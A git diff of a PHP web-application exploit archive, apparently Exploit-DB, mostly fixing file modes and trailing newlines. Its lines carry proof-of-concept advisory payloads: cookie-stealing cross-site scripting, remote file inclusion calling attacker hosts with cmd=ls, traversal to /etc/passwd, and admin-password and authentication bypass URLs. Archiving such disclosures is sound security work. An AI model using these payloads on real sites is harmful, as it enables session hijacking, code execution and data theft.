a/platforms/php/webapps/21206.txt +++ b/platforms/php/webapps/21206.txt @@ -6,4 +6,4 @@ It is possible for a malicious user to create a link to the phptonuke.php script This type of attack may be used to hijack a legitimate user's session via theft of cookie-based authentication credentials. -http://phpnukesite/phptonuke.php?filnavn=<script>alert(document.cookie)</script> \ No newline at end of file +http://phpnukesite/phptonuke.php?filnavn=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2121.txt b/platforms/php/webapps/2121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2122.txt b/platforms/php/webapps/2122.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21220.txt b/platforms/php/webapps/21220.txt old mode 100755 new mode 100644 index 8fe994598..86f488e2a --- a/platforms/php/webapps/21220.txt +++ b/platforms/php/webapps/21220.txt @@ -95,5 +95,4 @@ Sepahan TelCom Network And Security Group (septelcom) www.septelcom.net -E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net - \ No newline at end of file +E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net \ No newline at end of file diff --git a/platforms/php/webapps/21221.txt b/platforms/php/webapps/21221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21222.txt b/platforms/php/webapps/21222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2123.txt b/platforms/php/webapps/2123.txt old mode 100755 new mode 100644 index 6c73a2058..80e66aa41 --- a/platforms/php/webapps/2123.txt +++ b/platforms/php/webapps/2123.txt @@ -18,5 +18,4 @@ Att. SirDarckCat elhacker.net -# milw0rm.com [2006-08-07] - \ No newline at end of file +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/21230.txt b/platforms/php/webapps/21230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21233.txt b/platforms/php/webapps/21233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21241.txt b/platforms/php/webapps/21241.txt old mode 100755 new mode 100644 index 691600f5f..71baf4d68 --- a/platforms/php/webapps/21241.txt +++ b/platforms/php/webapps/21241.txt @@ -10,4 +10,4 @@ The following URL is sufficient to exploit this issue: http://some.host/wikihome/action/conflict.php?TemplateDir=http://my.host/ -where conflict.php is the name of the malicious attacker-supplied script. \ No newline at end of file +where conflict.php is the name of the malicious attacker-supplied script. \ No newline at end of file diff --git a/platforms/php/webapps/2125.txt b/platforms/php/webapps/2125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21250.txt b/platforms/php/webapps/21250.txt old mode 100755 new mode 100644 index 4d0f0b234..7223a26f8 --- a/platforms/php/webapps/21250.txt +++ b/platforms/php/webapps/21250.txt @@ -26,5 +26,4 @@ change X with number of post [!x!] To: All friends Cyber_Devil Allah with you -members [No-exploit.Com] - \ No newline at end of file +members [No-exploit.Com] \ No newline at end of file diff --git a/platforms/php/webapps/21251.txt b/platforms/php/webapps/21251.txt old mode 100755 new mode 100644 index 68af3e9de..b6a128128 --- a/platforms/php/webapps/21251.txt +++ b/platforms/php/webapps/21251.txt @@ -51,4 +51,4 @@ $cookiepre = '9x5G74'; ############################################ -# Greetz to my friendz \ No newline at end of file +# Greetz to my friendz \ No newline at end of file diff --git a/platforms/php/webapps/21267.txt b/platforms/php/webapps/21267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21269.txt b/platforms/php/webapps/21269.txt old mode 100755 new mode 100644 index e35025439..e6515e793 --- a/platforms/php/webapps/21269.txt +++ b/platforms/php/webapps/21269.txt @@ -13,4 +13,4 @@ you can delete file uploaded in post and upload your files (for php if allowed y ######################################################################################### [!x!] Exploit: Exploit: http://server/edownloadscart/uploads/X/ change X with number of post ######################################################################################## -[!x!] To: All friendsCyber_Devil Allah with you members [No-exploit.Com] \ No newline at end of file +[!x!] To: All friendsCyber_Devil Allah with you members [No-exploit.Com] \ No newline at end of file diff --git a/platforms/php/webapps/2127.txt b/platforms/php/webapps/2127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21270.txt b/platforms/php/webapps/21270.txt old mode 100755 new mode 100644 index b8d8b54a5..7d8839262 --- a/platforms/php/webapps/21270.txt +++ b/platforms/php/webapps/21270.txt @@ -10,4 +10,4 @@ Notes : No-ExploiT.CoM ######################################################################################### [!x!] Bug: Delete Arbitrary File Vulnerability you can delete file uploaded in post and upload your files (for php if allowed you can :)) ######################################################################################### [!x!] Exploit: Exploit: http://server/businessdirectory/uploads/X/ change X with number of post ######################################################################################## -[!x!] To: All friendsCyber_Devil Allah with you members [No-exploit.Com] \ No newline at end of file +[!x!] To: All friendsCyber_Devil Allah with you members [No-exploit.Com] \ No newline at end of file diff --git a/platforms/php/webapps/21271.txt b/platforms/php/webapps/21271.txt old mode 100755 new mode 100644 index 298b01d6d..3f460d094 --- a/platforms/php/webapps/21271.txt +++ b/platforms/php/webapps/21271.txt @@ -9,4 +9,4 @@ Site : No-ExploiT.CoM (Is Back) Notes : No-ExploiT.CoM ######################################################################################### [!x!] Bug: Delete Arbitrary File Vulnerability you can delete file uploaded in post and upload your files (for php if allowed you can :)) ######################################################################################### [!x!] Exploit: Exploit: http://server/photogallery/uploads/X/ change X with number of post ######################################################################################## -[!x!] To: All friendsCyber_Devil Allah with you members [No-exploit.Com] \ No newline at end of file +[!x!] To: All friendsCyber_Devil Allah with you members [No-exploit.Com] \ No newline at end of file diff --git a/platforms/php/webapps/21273.txt b/platforms/php/webapps/21273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21277.txt b/platforms/php/webapps/21277.txt old mode 100755 new mode 100644 index a2e5f64cd..a2e5f01b0 --- a/platforms/php/webapps/21277.txt +++ b/platforms/php/webapps/21277.txt @@ -6,4 +6,4 @@ Portix-PHP is prone to directory traversal attacks. The script index.php does no Successful exploitation may cause sensitive information to be disclosed to the attacker. Information gathered in this manner may be used to aid in further attacks against the host. -www.hostportix.com/index.php?l=../../../etc/passwd \ No newline at end of file +www.hostportix.com/index.php?l=../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/21278.txt b/platforms/php/webapps/21278.txt old mode 100755 new mode 100644 index 5d8975596..b83ddd6ab --- a/platforms/php/webapps/21278.txt +++ b/platforms/php/webapps/21278.txt @@ -6,4 +6,4 @@ Portix-PHP is prone to directory traversal attacks. The script view.php does not Successful exploitation may cause sensitive information to be disclosed to the attacker. Information gathered in this manner may be used to aid in further attacks against the host. -www.hostportix.com/index.php?l=forum/view.php&topic=../../../etc/passwd \ No newline at end of file +www.hostportix.com/index.php?l=forum/view.php&topic=../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/21279.txt b/platforms/php/webapps/21279.txt old mode 100755 new mode 100644 index 163ae255f..c88b992b5 --- a/platforms/php/webapps/21279.txt +++ b/platforms/php/webapps/21279.txt @@ -8,4 +8,4 @@ Successful hijacking of the administrative account will permit the malicious use Change the values in the stored cookie to the following: -name=access value=ok \ No newline at end of file +name=access value=ok \ No newline at end of file diff --git a/platforms/php/webapps/2128.txt b/platforms/php/webapps/2128.txt old mode 100755 new mode 100644 index a5c11cf20..06ba6cb90 --- a/platforms/php/webapps/2128.txt +++ b/platforms/php/webapps/2128.txt @@ -27,5 +27,4 @@ http://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root #Pozdro dla wszystkich ;-) -# milw0rm.com [2006-08-07] - \ No newline at end of file +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/2129.txt b/platforms/php/webapps/2129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21299.txt b/platforms/php/webapps/21299.txt old mode 100755 new mode 100644 index 8b20c64e2..9a4303b77 --- a/platforms/php/webapps/21299.txt +++ b/platforms/php/webapps/21299.txt @@ -8,4 +8,4 @@ This may enable an attacker to steal cookie-based authentication credentials fro http://www.server.com/pforum/edituser.php?boardid=&amp;agree=1 &amp;username=%3Cscript%3Ealert(document.cookie)%3C/script%3E -&amp;nickname=test&amp;email=test@test.com&amp;pwd=test&amp;pwd2=test&amp;filled=1 \ No newline at end of file +&amp;nickname=test&amp;email=test@test.com&amp;pwd=test&amp;pwd2=test&amp;filled=1 \ No newline at end of file diff --git a/platforms/php/webapps/2130.txt b/platforms/php/webapps/2130.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21300.txt b/platforms/php/webapps/21300.txt old mode 100755 new mode 100644 index 961946c9a..fa5eb00fa --- a/platforms/php/webapps/21300.txt +++ b/platforms/php/webapps/21300.txt @@ -4,4 +4,4 @@ The Extreme Message Board (XMB) 1.6 Magic Lantern pre-beta version reportedly al This has been fixed in the 1.6 Magic Lantern final beta version of XMB. -[img]javasCript:alert('Hello world.')[/img] \ No newline at end of file +[img]javasCript:alert('Hello world.')[/img] \ No newline at end of file diff --git a/platforms/php/webapps/21301.txt b/platforms/php/webapps/21301.txt old mode 100755 new mode 100644 index 4a8d8693c..2ae273822 --- a/platforms/php/webapps/21301.txt +++ b/platforms/php/webapps/21301.txt @@ -8,5 +8,4 @@ OpenBB allows users to include images in forum messages using image tags, with t It is possible to inject arbitrary script code into forum messages via these image tags. Script code will be executed in the browser of the user viewing the forum message, in the context of the website running the vulnerable software. This may allow an attacker to steal cookie-based authentication credentials. -[img]javasCript:alert('Hello world.')[/img] - \ No newline at end of file +[img]javasCript:alert('Hello world.')[/img] \ No newline at end of file diff --git a/platforms/php/webapps/21304.txt b/platforms/php/webapps/21304.txt old mode 100755 new mode 100644 index e6a9d75eb..04aca687a --- a/platforms/php/webapps/21304.txt +++ b/platforms/php/webapps/21304.txt @@ -13,4 +13,4 @@ Reports have indicated that this may be an issue in older versions. It has also been reported that Ikonboard 3.1.1 is also vulnerable to this issue. [img]javasCript:alert('Hello world.')[/img] -[IMG]javascript:alert(document.cookie).gif[/IMG] \ No newline at end of file +[IMG]javascript:alert(document.cookie).gif[/IMG] \ No newline at end of file diff --git a/platforms/php/webapps/2131.txt b/platforms/php/webapps/2131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21312.txt b/platforms/php/webapps/21312.txt old mode 100755 new mode 100644 index 217c9540c..94fef442b --- a/platforms/php/webapps/21312.txt +++ b/platforms/php/webapps/21312.txt @@ -8,4 +8,4 @@ ReBB allows users to include images in forum messages using image tags, with the It is possible to inject arbitrary script code into forum messages via these image tags. Script code will be executed in the browser of the user viewing the forum message, in the context of the website running the vulnerable software. This may allow an attacker to steal cookie-based authentication credentials. -[img]javascript:alert('test')[/img] \ No newline at end of file +[img]javascript:alert('test')[/img] \ No newline at end of file diff --git a/platforms/php/webapps/21316.txt b/platforms/php/webapps/21316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21317.txt b/platforms/php/webapps/21317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2132.txt b/platforms/php/webapps/2132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21324.txt b/platforms/php/webapps/21324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21327.txt b/platforms/php/webapps/21327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21329.txt b/platforms/php/webapps/21329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2133.txt b/platforms/php/webapps/2133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21330.txt b/platforms/php/webapps/21330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2134.txt b/platforms/php/webapps/2134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21343.txt b/platforms/php/webapps/21343.txt old mode 100755 new mode 100644 index a8d5699e1..1e48c341b --- a/platforms/php/webapps/21343.txt +++ b/platforms/php/webapps/21343.txt @@ -6,4 +6,4 @@ PHProjekt is prone to an issue which may allow an attacker to include arbitrary Successful exploitation depends partly on the configuration of PHP on the host running the vulnerable software. If 'all_url_fopen' is set to 'off' then exploitation of this issue may be limited. -http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts \ No newline at end of file +http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts \ No newline at end of file diff --git a/platforms/php/webapps/21349.txt b/platforms/php/webapps/21349.txt old mode 100755 new mode 100644 index 1dfae41ed..911106064 --- a/platforms/php/webapps/21349.txt +++ b/platforms/php/webapps/21349.txt @@ -6,4 +6,4 @@ A vulnerability has been reported in some versions of PHP-Nuke. Reportedly, a ma It has been suggested that this is the result of an insecure server configuration. -http://www.site.com/index.php?file=index.php \ No newline at end of file +http://www.site.com/index.php?file=index.php \ No newline at end of file diff --git a/platforms/php/webapps/2135.txt b/platforms/php/webapps/2135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21357.txt b/platforms/php/webapps/21357.txt old mode 100755 new mode 100644 index 2c67febc8..d0ff39aea --- a/platforms/php/webapps/21357.txt +++ b/platforms/php/webapps/21357.txt @@ -6,4 +6,4 @@ A vulnerability has been reported in some versions of PostNuke. Reportedly, it i Other versions of PostNuke may share this vulnerability. This has not, however, been confirmed. -http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host \ No newline at end of file +http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host \ No newline at end of file diff --git a/platforms/php/webapps/2137.txt b/platforms/php/webapps/2137.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21377.txt b/platforms/php/webapps/21377.txt old mode 100755 new mode 100644 index c142d8421..f1270e177 --- a/platforms/php/webapps/21377.txt +++ b/platforms/php/webapps/21377.txt @@ -6,4 +6,4 @@ SunShop allows attackers to embed arbitrary script code into form fields. This m Enter the following name when registering as a new customer: -blackhat<script>alert('ouch')</script> \ No newline at end of file +blackhat<script>alert('ouch')</script> \ No newline at end of file diff --git a/platforms/php/webapps/21380.php b/platforms/php/webapps/21380.php old mode 100755 new mode 100644 index 45d31d611..584213124 --- a/platforms/php/webapps/21380.php +++ b/platforms/php/webapps/21380.php @@ -18,4 +18,4 @@ eros/236.jpg[/IMG]&signature=1"); /* Redirect browser*/ 2.Register in forum 3.Send a message like this -"Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]" \ No newline at end of file +"Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]" \ No newline at end of file diff --git a/platforms/php/webapps/21381.txt b/platforms/php/webapps/21381.txt old mode 100755 new mode 100644 index ab0f60889..0b17fa567 --- a/platforms/php/webapps/21381.txt +++ b/platforms/php/webapps/21381.txt @@ -5,4 +5,4 @@ xGB is guestbook software. It is written in PHP and will run on most Unix and Li xGB allows users to post images in guestbook entries by using special syntax to denote a link to an image. However, script code is not filtered from the image tags ([img][/img]) used by the guestbook. An attacker may cause script code to be executed by arbitrary web users who view the guestbook entries. [img]javascript:alert('This Guestbook allows Cross Site -Scripting');[/img] \ No newline at end of file +Scripting');[/img] \ No newline at end of file diff --git a/platforms/php/webapps/21382.txt b/platforms/php/webapps/21382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21383.txt b/platforms/php/webapps/21383.txt old mode 100755 new mode 100644 index 14b138b35..0051360b5 --- a/platforms/php/webapps/21383.txt +++ b/platforms/php/webapps/21383.txt @@ -13,4 +13,4 @@ entry: <?php inlcude("text.txt");?>testmail@localhost.de Subscribe with the following address to add an address more than one time: -(testmail@localhost.de)%testmail@localhost.de%testmail@localhost.de%testmail@localhost.de \ No newline at end of file +(testmail@localhost.de)%testmail@localhost.de%testmail@localhost.de%testmail@localhost.de \ No newline at end of file diff --git a/platforms/php/webapps/2139.txt b/platforms/php/webapps/2139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21391.txt b/platforms/php/webapps/21391.txt old mode 100755 new mode 100644 index 899602298..b35ffc3cd --- a/platforms/php/webapps/21391.txt +++ b/platforms/php/webapps/21391.txt @@ -15,4 +15,4 @@ DELETE A POLL: http://target/pvote/del.php?pollorder=1 -where pollorder is the poll 'id' number for the poll to be deleted. \ No newline at end of file +where pollorder is the poll 'id' number for the poll to be deleted. \ No newline at end of file diff --git a/platforms/php/webapps/21393.txt b/platforms/php/webapps/21393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21396.txt b/platforms/php/webapps/21396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21397.txt b/platforms/php/webapps/21397.txt old mode 100755 new mode 100644 index d57a822ee..323b86dd8 --- a/platforms/php/webapps/21397.txt +++ b/platforms/php/webapps/21397.txt @@ -6,4 +6,4 @@ It is possible to change the administrative password by submitting a malicious w http://target/pvote/ch_info.php?newpass=password&confirm=password -where password is the attacker-supplied value for the new administrative password. \ No newline at end of file +where password is the attacker-supplied value for the new administrative password. \ No newline at end of file diff --git a/platforms/php/webapps/21399.txt b/platforms/php/webapps/21399.txt old mode 100755 new mode 100644 index 11c3c4ec8..5fbcc2e09 --- a/platforms/php/webapps/21399.txt +++ b/platforms/php/webapps/21399.txt @@ -8,4 +8,4 @@ An attacker who exploits this may be able to hijack web content or steal cookie- Post a message with the following text in the subject or message body: -<script>alert('Cross Site Scripting possible');</script> \ No newline at end of file +<script>alert('Cross Site Scripting possible');</script> \ No newline at end of file diff --git a/platforms/php/webapps/21401.txt b/platforms/php/webapps/21401.txt old mode 100755 new mode 100644 index d74053f7e..94cd48650 --- a/platforms/php/webapps/21401.txt +++ b/platforms/php/webapps/21401.txt @@ -6,4 +6,4 @@ PostBoard does not sanitize code submitted to site between IMG tags. Due to this The following code is proof of concept: -[IMG]javascript:alert('give me cookies');[/IMG] \ No newline at end of file +[IMG]javascript:alert('give me cookies');[/IMG] \ No newline at end of file diff --git a/platforms/php/webapps/21403.txt b/platforms/php/webapps/21403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2141.txt b/platforms/php/webapps/2141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21418.txt b/platforms/php/webapps/21418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2142.txt b/platforms/php/webapps/2142.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21421.txt b/platforms/php/webapps/21421.txt old mode 100755 new mode 100644 index 6c32cbf74..97f80311c --- a/platforms/php/webapps/21421.txt +++ b/platforms/php/webapps/21421.txt @@ -6,4 +6,4 @@ Some of the PHProjekt scripts are only intended to be accessed by users who have http://www.somehost.com/phprojekt/mail/mail_send.php/sms -where the extraneous "sms" is included to be passed to the $PHP_SELF variable as part of the PATH_INFO. This causes PHPProjekt to behave as though the attacker accessing the script is logged on to PHPProjekt as a legitimate user. \ No newline at end of file +where the extraneous "sms" is included to be passed to the $PHP_SELF variable as part of the PATH_INFO. This causes PHPProjekt to behave as though the attacker accessing the script is logged on to PHPProjekt as a legitimate user. \ No newline at end of file diff --git a/platforms/php/webapps/21423.txt b/platforms/php/webapps/21423.txt old mode 100755 new mode 100644 index e858d44b0..d3a23238c --- a/platforms/php/webapps/21423.txt +++ b/platforms/php/webapps/21423.txt @@ -6,4 +6,4 @@ Ultimate PHP Board does not filter script code from image tags. This may allow a It may be possible to inject script code into other UPB-Code formatting tags, though this has not been confirmed. -[ img]javascript:window.open(' index.php?upb=pm&mode=send&send=yes&target_id=SONPROPREID&betreff=cookie&pm=' +document.cookie+ ' &smilies=1&use_upbcode=1&pmbox_id=IDDELAVICTIME&check=yes ')[/img ] \ No newline at end of file +[ img]javascript:window.open(' index.php?upb=pm&mode=send&send=yes&target_id=SONPROPREID&betreff=cookie&pm=' +document.cookie+ ' &smilies=1&use_upbcode=1&pmbox_id=IDDELAVICTIME&check=yes ')[/img ] \ No newline at end of file diff --git a/platforms/php/webapps/21424.txt b/platforms/php/webapps/21424.txt old mode 100755 new mode 100644 index 458f8f059..7bac33b94 --- a/platforms/php/webapps/21424.txt +++ b/platforms/php/webapps/21424.txt @@ -4,4 +4,4 @@ Admanager is banner advertisement management software. It is written in PHP and Access to the 'add.php3' script does not require authentication. It is possible for a remote attacker to manipulate URL parameters of this script and change banner advertisement content. -http://target/add.php3?url=http://www.url.com&adurl=http://URL/img.gif URL/ \ No newline at end of file +http://target/add.php3?url=http://www.url.com&adurl=http://URL/img.gif URL/ \ No newline at end of file diff --git a/platforms/php/webapps/21425.txt b/platforms/php/webapps/21425.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21426.txt b/platforms/php/webapps/21426.txt old mode 100755 new mode 100644 index b5b6492fd..27dffe949 --- a/platforms/php/webapps/21426.txt +++ b/platforms/php/webapps/21426.txt @@ -4,4 +4,4 @@ Blahz-DNS is a web based management tool for DNS information. It is implemented By directly calling scripts included with Blahz-DNS, it is possible to bypass the authentication check, gaining full access to the Blahz-DNS tool. -http://www.example.com/dostuff.php?action=modify_user \ No newline at end of file +http://www.example.com/dostuff.php?action=modify_user \ No newline at end of file diff --git a/platforms/php/webapps/21427.txt b/platforms/php/webapps/21427.txt old mode 100755 new mode 100644 index daf77ebb8..be7c0e395 --- a/platforms/php/webapps/21427.txt +++ b/platforms/php/webapps/21427.txt @@ -6,4 +6,4 @@ MiniBB does not filter script code from URL parameters, making it prone to cross This may enable a remote attacker to steal cookie-based authentication credentials from legitimate users of a website running MiniBB. -http://target/forums/index.php?action=search&searchFor="><script>alert("test")</script > \ No newline at end of file +http://target/forums/index.php?action=search&searchFor="><script>alert("test")</script > \ No newline at end of file diff --git a/platforms/php/webapps/21436.txt b/platforms/php/webapps/21436.txt old mode 100755 new mode 100644 index ee04d32e8..e8c4190f5 --- a/platforms/php/webapps/21436.txt +++ b/platforms/php/webapps/21436.txt @@ -4,4 +4,4 @@ B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post ne A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system. -http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls \ No newline at end of file +http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls \ No newline at end of file diff --git a/platforms/php/webapps/21447.txt b/platforms/php/webapps/21447.txt old mode 100755 new mode 100644 index adb5f275b..0694fdf3d --- a/platforms/php/webapps/21447.txt +++ b/platforms/php/webapps/21447.txt @@ -10,4 +10,4 @@ XMB Forum 1.6 Magic Lantern is a web-based discussion forum. It is vulnerable to member.php?action=viewpro&member=<form%20name=o><input%20name=u%20value=XSS></form><script>alert(document.o.u.value)</script> -member.php?action=reg&username=%253Cscript%253E&... . \ No newline at end of file +member.php?action=reg&username=%253Cscript%253E&... . \ No newline at end of file diff --git a/platforms/php/webapps/21448.txt b/platforms/php/webapps/21448.txt old mode 100755 new mode 100644 index 3950922cc..4c3623d33 --- a/platforms/php/webapps/21448.txt +++ b/platforms/php/webapps/21448.txt @@ -4,4 +4,4 @@ XMB Forum 1.6 Magic Lantern allows remote users to conduct activities in the for In addition, log files (index_log.log and cplogfile.log) may be written with improper permissions allowing users to retrieve them with a browser. -/forumpath/index.php?analized=anything \ No newline at end of file +/forumpath/index.php?analized=anything \ No newline at end of file diff --git a/platforms/php/webapps/21449.txt b/platforms/php/webapps/21449.txt old mode 100755 new mode 100644 index e8a6daf31..3b3fdb1b4 --- a/platforms/php/webapps/21449.txt +++ b/platforms/php/webapps/21449.txt @@ -6,4 +6,4 @@ A script injection issue has been reported with the way emails are displayed to <script>alert(document.cookie)</script> -This will show the victim's session id. \ No newline at end of file +This will show the victim's session id. \ No newline at end of file diff --git a/platforms/php/webapps/21454.txt b/platforms/php/webapps/21454.txt old mode 100755 new mode 100644 index 093a93c23..c6922e80a --- a/platforms/php/webapps/21454.txt +++ b/platforms/php/webapps/21454.txt @@ -4,4 +4,4 @@ Pseudo-frames is an application written in PHP and is maintained by Clicky Web. Pseudo-frames permit remote file including. As a result, a remote attacker may include an arbitrary file located on a remote host. If this file is a PHP script, it will be executed on the host running the vulnerable software. -http://www.site.com/index.php?page=http://www.haxor.com/file \ No newline at end of file +http://www.site.com/index.php?page=http://www.haxor.com/file \ No newline at end of file diff --git a/platforms/php/webapps/21459.txt b/platforms/php/webapps/21459.txt old mode 100755 new mode 100644 index cf28e5553..ab43fb683 --- a/platforms/php/webapps/21459.txt +++ b/platforms/php/webapps/21459.txt @@ -8,4 +8,4 @@ The vulnerability exists in 'plugin.php','admin.php' and 'del.php' files found i http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls -http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls \ No newline at end of file +http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls \ No newline at end of file diff --git a/platforms/php/webapps/2146.txt b/platforms/php/webapps/2146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21461.txt b/platforms/php/webapps/21461.txt old mode 100755 new mode 100644 index d29e284d6..62c6f4ae3 --- a/platforms/php/webapps/21461.txt +++ b/platforms/php/webapps/21461.txt @@ -8,4 +8,4 @@ Attackers may exploit this vulnerability to obtain user credentials. http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script> -http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script> \ No newline at end of file +http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script> \ No newline at end of file diff --git a/platforms/php/webapps/21463.txt b/platforms/php/webapps/21463.txt old mode 100755 new mode 100644 index 8f22c0a9c..b975394a6 --- a/platforms/php/webapps/21463.txt +++ b/platforms/php/webapps/21463.txt @@ -4,4 +4,4 @@ mcNews is a set of scripts for allowing users to post news stories on a webpage. mcNews does not sufficiently filter dot-dot-slash (../) sequences from URL parameters. As a result, a remote attacker can disclose the contents of arbitrary web-readable files that exist on a host running the vulnerable software. -http://target/admin/header.php?voir=hop&skinfile=../../file \ No newline at end of file +http://target/admin/header.php?voir=hop&skinfile=../../file \ No newline at end of file diff --git a/platforms/php/webapps/21474.txt b/platforms/php/webapps/21474.txt old mode 100755 new mode 100644 index a802d03c7..110b36920 --- a/platforms/php/webapps/21474.txt +++ b/platforms/php/webapps/21474.txt @@ -6,4 +6,4 @@ OpenBB is reportedly vulnerable to HTML injection attacks. The vulnerability occ OpenBB uses 'BBCodes' in the place of HTML code to include images, links etc. However, HTML tags are not adequately replaced from with BBCodes. It is possible to inject arbitrary HTML code into forum messages. As a result, OpenBB is prone to cross-agent scripting attacks. Script code will be executed in the browser of the user viewing the forum message and may allow an attacker to steal cookie-based authentication credentials. -[ img]http:// " onerror="ANYSCRIPT"[/img ] \ No newline at end of file +[ img]http:// " onerror="ANYSCRIPT"[/img ] \ No newline at end of file diff --git a/platforms/php/webapps/21478.txt b/platforms/php/webapps/21478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21479.txt b/platforms/php/webapps/21479.txt old mode 100755 new mode 100644 index 915dce8d4..258a87e30 --- a/platforms/php/webapps/21479.txt +++ b/platforms/php/webapps/21479.txt @@ -7,4 +7,4 @@ It has been reported that OpenBB is vulnerable to a cross-site scripting attack. Attackers may exploit this vulnerability by constructing a link to one of these scripts containing malicious script code. If the link is sent to a OpenBB user and clicked on, the attacker-supplied script code will run in the context of the user's OpenBB session. The script code may obtain cookie values or perform unauthorized actions as the victim user. http://targetsite/myhome.php?action=messages&box=<form%20name=a><input%20name=i%20value=XSS></form> -<script>alert(document.a.i.value)</script> \ No newline at end of file +<script>alert(document.a.i.value)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2148.txt b/platforms/php/webapps/2148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21486.txt b/platforms/php/webapps/21486.txt old mode 100755 new mode 100644 index b57505575..4c60c322c --- a/platforms/php/webapps/21486.txt +++ b/platforms/php/webapps/21486.txt @@ -9,4 +9,4 @@ The attacker may exploit this issue to inject script code into forum messages. W phpBB versions prior to the phpBB2 series may also be affected by this vulnerability. -[img]http://a.a/a"onerror="javascript:alert(document.cookie)[/img] \ No newline at end of file +[img]http://a.a/a"onerror="javascript:alert(document.cookie)[/img] \ No newline at end of file diff --git a/platforms/php/webapps/2149.txt b/platforms/php/webapps/2149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21509.txt b/platforms/php/webapps/21509.txt old mode 100755 new mode 100644 index 27639eb00..a6d1f6d2a --- a/platforms/php/webapps/21509.txt +++ b/platforms/php/webapps/21509.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/4924/info Teekai's Tracking Online does not adequately filter HTML tags from certain URL parameters, making it prone to cross-site scripting attacks. Attackers may exploit this by creating a malicious link to a vulnerable webpage. -http://target/page.php?action=view&id=1<script>alert(document.cookie)</script > \ No newline at end of file +http://target/page.php?action=view&id=1<script>alert(document.cookie)</script > \ No newline at end of file diff --git a/platforms/php/webapps/2151.txt b/platforms/php/webapps/2151.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21514.txt b/platforms/php/webapps/21514.txt old mode 100755 new mode 100644 index dbdec2858..c99289dbf --- a/platforms/php/webapps/21514.txt +++ b/platforms/php/webapps/21514.txt @@ -4,4 +4,4 @@ Splatt Forum does not filter HTML from image tags. This may allow an attacker to This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users. -[img]http://a.a/a"onerror="javascript:alert(document.cookie)[/img] \ No newline at end of file +[img]http://a.a/a"onerror="javascript:alert(document.cookie)[/img] \ No newline at end of file diff --git a/platforms/php/webapps/21517.txt b/platforms/php/webapps/21517.txt old mode 100755 new mode 100644 index 6f5c73e1a..268d866ba --- a/platforms/php/webapps/21517.txt +++ b/platforms/php/webapps/21517.txt @@ -4,4 +4,4 @@ It has been reported that multiple vulnerabilities exist in CBMS. 